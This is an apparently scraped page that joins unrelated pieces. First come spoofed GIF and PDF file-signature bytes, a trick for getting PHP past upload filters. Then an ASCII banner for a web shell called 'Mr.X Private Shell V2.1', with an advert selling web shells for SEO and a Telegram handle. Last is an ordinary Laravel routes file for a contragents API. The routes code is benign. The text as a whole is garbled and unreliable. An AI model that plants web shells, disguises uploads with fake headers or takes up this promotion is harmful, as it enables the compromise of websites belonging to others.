GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
declare(strict_types=1);
use App\Http\Controllers\Api\V1\ContragentsController;
use Illuminate\Support\Facades\Route;
Route::group(['prefix' => '/v1/contragents', 'middleware' => 'auth:sanctum'], function (): void {
Route::get('{modelID}/with-payments', [ContragentsController::class,'contragentsWithPayments']);
Route::get('{modelID}/list', [ContragentsController::class,'index']);
Route::get('{modelID}/{id}', [ContragentsController::class,'show']);
Route::post('{modelID}/create', [ContragentsController::class,'store']);
Route::post('{modelID}/{id}/update', [ContragentsController::class,'update']);
Route::delete('{modelID}/{id}', [ContragentsController::class,'destroy']);
});